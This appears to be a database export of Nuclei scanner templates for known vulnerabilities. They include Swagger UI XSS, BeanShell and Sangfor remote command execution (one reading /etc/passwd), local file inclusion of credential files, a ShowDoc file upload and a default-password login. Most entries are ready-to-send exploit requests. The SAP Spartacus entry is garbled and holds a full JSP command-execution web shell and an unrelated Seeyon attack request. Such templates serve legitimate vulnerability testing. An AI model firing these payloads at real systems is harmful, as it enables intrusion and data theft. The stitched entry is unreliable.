DhiyaneshDK\n severity: medium\n description: |\n Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.\n remediation: |\n Update to the latest version of the Swagger UI (^4.13.0 or higher) to mitigate the vulnerability.\n reference:\n - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-25031\n - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3506\n - https://github.com/swagger-api/swagger-ui/issues/4872\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2018-25031\n cwe-id: CWE-20\n epss-score: 0.00265\n epss-percentile: 0.65516\n cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: smartbear\n product: swagger_ui\n shodan-query: http.component:\"Swagger\"\n fofa-query: icon_hash=\"-1180440057\"\n tags: headless,cve,cve2018,swagger,xss,smartbear\nheadless:\n - steps:\n - args:\n url: '{{BaseURL}}/index.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Byb2plY3RkaXNjb3ZlcnkvbnVjbGVpLXRlbXBsYXRlcy9tYWluL2hlbHBlcnMvcGF5bG9hZHMvc3dhZ2dlci1wYXlsb2FkIgp9'\n action: navigate\n\n - action: waitload\n\n - action: script\n args:\n code: |\n () => {\n window.originalAlert = window.alert;\n window.alert = function(message) {\n window.alertTriggered = true\n }\n }\n\n - action: sleep\n\n - action: script\n name: alerts\n args:\n code: |\n () => {\n return window.alertTriggered\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: alerts\n words:\n - \"true\"\n\n - type: word\n part: body\n words:\n - \"swagger\"\n case-insensitive: true\n# digest: 4b0a004830460221008c5bb8afdc142dbf782c9bb579a7ed08079c67387a1285aaa34a20bd5f67a8e9022100905594915fd641bd07174ef818dd215bc18bc32845731f1aeb85ca745c8612e2:922c64590222798bb761d5b6d8e72950", "hash": "825586eacc14a4b3bb9e5941017e2baa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e00" }, "name": "js-libraries-detect.yaml", "content": "id: js-libraries-detect\n\ninfo:\n name: Common JS Libraries - Detection\n author: adamparsons,cbadke,ChetGan,ErikOwen,jacalynli,geeknik\n severity: info\n description: Checks a target web app for inclusion of common JavaScript libraries\n metadata:\n max-request: 1\n tags: headless,tech,js\n\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n - action: script\n name: fingerprintAxios\n args:\n code: |\n () => {\n //check for axios\n if (!window.axios) {\n return \"\"\n }\n\n try {\n // check for version\n // only works on some websites\n return window.axios.VERSION\n } catch (e) {}\n\n return \"Version not found\"\n }\n\n - action: script\n name: fingerprintBootstrap\n args:\n code: |\n () => {\n try {\n // if not using jQuery\n return bootstrap.Tooltip.VERSION || \"\"\n } catch (e) {}\n\n try {\n // if using jQuery\n return $.fn.tooltip.Constructor.VERSION || \"\"\n } catch (e) {}\n\n return \"\"\n }\n\n - action: script\n name: fingerprintJQuery\n args:\n code: |\n () => {\n let version = \"\";\n try {\n if(window.jQuery) {\n version = jQuery.fn.jquery;\n }\n if(window.$) {\n version = $.fn.jquery;\n }\n version = version.replace(\".min\", \"\");\n version = version.replace(\".slim\", \"\");\n return version;\n } catch (e) {}\n\n return \"\";\n }\n\n - action: script\n name: fingerprintLodash\n args:\n code: |\n () => {\n try {\n return _.VERSION || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintMomentJs\n args:\n code: |\n () => {\n try {\n return moment.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintReact\n args:\n code: |\n () => {\n try {\n return window.React.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintReactDOM\n args:\n code: |\n () => {\n try {\n if (window.ReactDOM) {\n return window.React.version || \"\";\n }\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintAngular\n args:\n code: |\n () => {\n\n try {\n // Angular Version 1\n return angular.version.full\n } catch (e) {}\n\n try {\n // Angular Version 2+\n return getAllAngularRootElements()[0].attributes[\"ng-version\"].value\n } catch (e) {}\n\n return \"\"\n }\n\n - action: script\n name: fingerprintBackboneJs\n args:\n code: |\n () => {\n\n try {\n return window.Backbone.VERSION || \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintEmberJs\n args:\n code: |\n () => {\n try {\n return Ember.VERSION || \"\"\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintVue\n args:\n code: |\n () => {\n\n //method 1 (simple)\n try {\n return Vue.version\n } catch (e) {}\n\n //method 2 (checks if Nuxt exists)\n try {\n const nuxtDetected = Boolean(window.__NUXT__ || window.$nuxt)\n if (nuxtDetected) {\n let Vue\n }\n if (window.$nuxt) {\n Vue = window.$nuxt.$root.constructor\n }\n return Vue.version\n } catch (e) {}\n\n //method 3 (go through all elements)\n try {\n const all = document.querySelectorAll('*')\n let flag\n for (let i = 0; i < all.length; i++) {\n if (all[i].__vue__) {\n flag = all[i]\n break\n }\n }\n if (flag) {\n let Vue = Object.getPrototypeOf(flag.__vue__).constructor\n while (Vue.super) {\n Vue = Vue.super\n }\n return Vue.version\n }\n return \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintDojoJs\n args:\n code: |\n () => {\n try {\n return ([dojo.version.major, dojo.version.minor, dojo.version.patch].join(\".\"))\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintDomPurify\n args:\n code: |\n () => {\n try {\n return DOMPurify.version || \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintModernizr\n args:\n code: |\n () => {\n try {\n return Modernizr._version || \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintD3\n args:\n code: |\n () => {\n try {\n return d3.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintThreeJs\n args:\n code: |\n () => {\n try {\n return THREE.REVISION || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintChartJs\n args:\n code: |\n () => {\n try {\n return Chart.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintSlick\n args:\n code: |\n () => {\n try {\n // Assuming Slick Carousel is used as a jQuery plugin\n return $.fn.slick.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintSelect2\n args:\n code: |\n () => {\n try {\n // Assuming Select2 is used as a jQuery plugin\n return $.fn.select2.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - len(fingerprintAxios) > 0\n - len(fingerprintBootstrap) > 0\n - len(fingerprintJQuery) > 0\n - len(fingerprintLodash) > 0\n - len(fingerprintMomentJs) > 0\n - len(fingerprintReact) > 0\n - len(fingerprintReactDOM) > 0\n - len(fingerprintAngular) > 0\n - len(fingerprintBackboneJs) > 0\n - len(fingerprintEmberJs) > 0\n - len(fingerprintVue) > 0\n - len(fingerprintDojoJs) > 0\n - len(fingerprintDomPurify) > 0\n - len(fingerprintModernizr) > 0\n - len(fingerprintD3) > 0\n - len(fingerprintThreeJs) > 0\n - len(fingerprintChartJs) > 0\n - len(fingerprintSlick) > 0\n - len(fingerprintSelect2) > 0\n extractors:\n - name: axios\n type: regex\n part: fingerprintAxios\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: bootstrap\n type: regex\n part: fingerprintBootstrap\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: jquery\n type: regex\n part: fingerprintJQuery\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: lodash\n type: regex\n part: fingerprintLodash\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: moment\n type: regex\n part: fingerprintMomentJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: react\n type: regex\n part: fingerprintReact\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: reactdom\n type: regex\n part: fingerprintReactDOM\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: angular\n type: regex\n part: fingerprintAngular\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: backbone\n type: regex\n part: fingerprintBackboneJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: emberjs\n type: regex\n part: fingerprintEmberJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: vuejs\n type: regex\n part: fingerprintVue\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: dojo\n type: regex\n part: fingerprintDojoJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: dompurify\n type: regex\n part: fingerprintDomPurify\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: modernizr\n type: regex\n part: fingerprintModernizr\n regex:\n - ^(0|[1-9]\\d*)(?:\\.(0|[1-9]\\d*))?(?:\\.(0|[1-9]\\d*))?(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: d3\n type: regex\n part: fingerprintD3\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)(?:-((?:0|[1-9]\\\\d*|\\\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\\\.(?:0|[1-9]\\\\d*|\\\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\\\+([0-9a-zA-Z-]+(?:\\\\.[0-9a-zA-Z-]+)*))?$\"\n\n - name: threejs\n type: regex\n part: fingerprintThreeJs\n regex:\n - \"^(0|[1-9]\\\\d*)$\"\n\n - name: chartjs\n type: regex\n part: fingerprintChartJs\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)$\"\n\n - name: slick\n type: regex\n part: fingerprintSlick\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)$\"\n\n - name: select2\n type: regex\n part: fingerprintSelect2\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)$\"\n# digest: 4a0a00473045022079533719529f55f1e51b1f116812923cef7ec5a3a85d88e782a3fcefe130d627022100967c15f1e6ec4fdc6fead7fdbc0944e6e33903ff5827f60a5e3fbf42668a1743:922c64590222798bb761d5b6d8e72950", "hash": "5c59bcb930db02a4e6e6f60f54b1a5b4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e01" }, "name": "sap-spartacus.yaml", "content": "id: sap-spartacus\n\ninfo:\n name: SAP Spartacus detect\n author: TechbrunchFR\n severity: info\n description: Spartacus is a lean, Angular-based JavaScript storefront for SAP Commerce Cloud that communicates exclusively through the Commerce REST API.\n reference:\n - https://github.com/SAP/spartacus\n metadata:\n verified: true\n tags: tech,sap,hybris,angular,spartacus,headless\n\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n matchers-condition: and\n matchers:\n - part: body\n type: word\n words:\n - \"<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\"\\n\");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\"x\".equals(request.getParameter(\"pwd\"))&&!\"\".equals(request.getParameter(\"{{randstr}}\"))){out.println(\"
\" +excuteCmd(request.getParameter(\"{{randstr}}\")) + \"
\");}else{out.println(\":-)\");}%>6e4f045d4b8506bf492ada7e3390d7ce\n - |\n GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_1, \"htmoffice operate\")'\n - 'contains(body_2, \"Windows IP\")'\n condition: and\n# digest: 4a0a004730450221009360315ece75ec5c9316007a233b61043694e13c5a244b98a6cd82b66123830302203191ef9220a5dce44e15568f6ae55424d1e76df6e730da4681b468967c70d4d6:922c64590222798bb761d5b6d8e72950", "hash": "92f491141091d260a440f38d06080997", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e07" }, "name": "CNVD-2019-32204.yaml", "content": "id: CNVD-2019-32204\n\ninfo:\n name: Fanwei e-cology <=9.0 - Remote Code Execution\n author: daffainfo\n severity: critical\n description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.\n reference:\n - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd,cnvd2019,fanwei,rce\n\nhttp:\n - raw:\n - |\n POST /bsh.servlet.BshServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n bsh.script=exec(\"cat+/etc/passwd\");&bsh.servlet.output=raw\n\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n# digest: 490a0046304402207065e9f47b12777fafbb246012afc4d06af471f3452a72e630d193448e4edfea0220281da2b0b896fdfba7eb51cd6a63c08c8eca2b5946ea1058191f31c631d03157:922c64590222798bb761d5b6d8e72950", "hash": "5a2a46f4cef1d7f44c690dc093c795ae", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e08" }, "name": "CNVD-2020-23735.yaml", "content": "id: CNVD-2020-23735\n\ninfo:\n name: Xxunchi CMS - Local File Inclusion\n author: princechaddha\n severity: high\n description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.\n reference:\n - https://www.cnvd.org.cn/flaw/show/2025171\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-22\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,xunchi,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"NzbwpQSdbY06Dngnoteo2wdgiekm7j4Ndisplay_errors\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fda563ee34984f37958ad8386737f26a2389c08b07b2b7b3a2df1730edc5b425022100c6379ed23eed0835d0b8f53aff95b36b4c498b113965558e3996844f26e59b75:922c64590222798bb761d5b6d8e72950", "hash": "433b74cca5c0cec7ae4bce74f35ec8ca", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e09" }, "name": "CNVD-2020-26585.yaml", "content": "id: CNVD-2020-26585\n\ninfo:\n name: Showdoc <2.8.6 - File Uploads\n author: pikpikcu,Co5mos\n severity: critical\n description: |\n ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.\n reference:\n - https://vul.wangan.com/a/CNVD-2020-26585\n - https://blog.csdn.net/qq_48985780/article/details/122211136\n - https://github.com/star7th/showdoc/pull/1059\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\n cvss-score: 9.9\n cwe-id: CWE-434\n metadata:\n verified: true\n max-request: 2\n fofa-query: app=\"ShowDoc\"\n tags: cnvd,cnvd2020,showdoc,fileupload,intrusive\nvariables:\n str1: \"{{randstr}}\"\n\nhttp:\n - raw:\n - |\n POST /index.php?s=/home/page/uploadImg HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633\n\n ----------------------------835846770881083140190633\n Content-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{randstr}}.<>txt\"\n Content-Type: text/plain\n\n {{str1}}\n ----------------------------835846770881083140190633--\n - |\n GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - body_2 == str1\n condition: and\n\n extractors:\n - type: regex\n name: date\n part: body\n group: 1\n regex:\n - '(\\d{4}-\\d{2}-\\d{2})\\\\/([a-f0-9]+\\.txt)'\n internal: true\n\n - type: regex\n name: file\n part: body\n group: 2\n regex:\n - '(\\d{4}-\\d{2}-\\d{2})\\\\/([a-f0-9]+\\.txt)'\n internal: true\n\n# digest: 4a0a00473045022062cd2c2372723a192107237f88061ef28ac914b37b54a0221127375e1ffce96c0221009f238b324e1dc2027171daa5c91398f44270177f799e5bef425529f795d8f979:922c64590222798bb761d5b6d8e72950\n", "hash": "80ac57e63fd5ae3e9186cb5216b4a9a4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0a" }, "name": "CNVD-2020-46552.yaml", "content": "id: CNVD-2020-46552\n\ninfo:\n name: Sangfor EDR - Remote Code Execution\n author: ritikchaddha\n severity: critical\n description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.\n reference:\n - https://www.modb.pro/db/144475\n - https://blog.csdn.net/bigblue00/article/details/108434009\n - https://cn-sec.com/archives/721509.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,sangfor,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php\"\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body, \"$show_input = function($info)\")'\n - 'contains(body, \"$strip_slashes($host)\")'\n - 'contains(body, \"Log Helper\")'\n - 'status_code == 200'\n condition: and\n\n# digest: 4a0a0047304502202862eba6aef622b1dae0bcb4e023f3454a7d9bafa253edded09bef38bbf64713022100e4f0118515d3ce26dfb977df1e3bb9a11401d1b113b5842311bcadea68b213bc:922c64590222798bb761d5b6d8e72950\n", "hash": "2f71d659afad741bd4f1f1698721259c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0b" }, "name": "CNVD-2020-56167.yaml", "content": "id: CNVD-2020-56167\n\ninfo:\n name: Ruijie Smartweb - Default Password\n author: pikpikcu\n severity: low\n description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167\n - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,ruijie,default-login\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/WEB_VMS/LEVEL15/\"\n\n headers:\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n\n body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Level was: LEVEL15\"\n - \"/WEB_VMS/LEVEL15/\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220206f707c972c341622e8e5037848470fb78807b3dc49619bb3724e11e55efd750221009b249e3c56ef9025b5f50eff649dbcf9a7d8cdee87aca961f8932f8300e8372e:922c64590222798bb761d5b6d8e72950", "hash": "335bb01e2376f5612aeec3874e89d534", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0c" }, "name": "CNVD-2020-62422.yaml", "content": "id: CNVD-2020-62422\n\ninfo:\n name: Seeyon - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Seeyon is vulnerable to local file inclusion.\n reference:\n - https://blog.csdn.net/m0_46257936/article/details/113150699\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,lfi,seeyon\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties\"\n\n matchers-condition: and\n matchers:\n - type: status\n status:\n - 200\n\n - type: word\n part: header\n words:\n - \"application/x-msdownload\"\n condition: and\n\n - type: word\n part: body\n words:\n - \"ctpDataSource.password\"\n condition: and\n# digest: 4a0a0047304502201f896e58e7e2664e2640d78f636e25624c0d2baf53976cc8494b1e2dc5e68f97022100baf24b5ae58e69e58cfc79a0a78fb0afe39e8dc78e4797bb1890f40c2b102094:922c64590222798bb761d5b6d8e72950", "hash": "e47e625491662e281bb53cd7107887df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0d" }, "name": "CNVD-2020-63964.yaml", "content": "id: CNVD-2020-63964\n\ninfo:\n name: jshERP - Information Disclosure\n author: brucelsone\n severity: high\n description: |\n jshERP that can reveal sensitive information including system credentials without credentials.\n reference:\n - https://cn-sec.com/archives/1798444.html\n metadata:\n max-request: 1\n shodan-query: http.favicon.hash:-1298131932\n fofa-query: jshERP-boot\n tags: cnvd,cnvd2020,jsherp,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jshERP-boot/user/getAllList;.ico\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"username\":'\n - '\"loginName\":'\n - '\"password\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950", "hash": "984edb1bc42d8dce432c7d4ba3530053", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0e" }, "name": "CNVD-2020-67113.yaml", "content": "id: CNVD-2020-67113\n\ninfo:\n name: H5S CONSOLE - Unauthorized Access\n author: ritikchaddha\n severity: medium\n description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.\n reference:\n - https://vul.wangan.com/a/CNVD-2020-67113\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-425\n metadata:\n verified: true\n max-request: 2\n shodan-query: http.title:\"H5S CONSOLE\"\n tags: cnvd,cnvd2020,h5s,unauth,h5sconsole\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/GetSrc\"\n - \"{{BaseURL}}/api/v1/GetDevice\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'strUser'\n - 'strPasswd'\n condition: and\n\n - type: word\n part: body\n words:\n - 'H5_AUTO'\n - 'H5_DEV'\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n\n# digest: 4a0a004730450221009699239931e6e4becf71892aeb11692cfd9d64a3ab68b722b6ac11bd2145932b02200ebc3e717d8f7e13284940a74c6e295db280a0da787c8cb68551251918bbc153:922c64590222798bb761d5b6d8e72950\n", "hash": "dce8d7e7593c44dc725b06f317465ce0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e0f" }, "name": "CNVD-2020-68596.yaml", "content": "id: CNVD-2020-68596\n\ninfo:\n name: WeiPHP 5.0 - Path Traversal\n author: pikpikcu\n severity: high\n description: WeiPHP 5.0 is susceptible to directory traversal attacks.\n reference:\n - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n 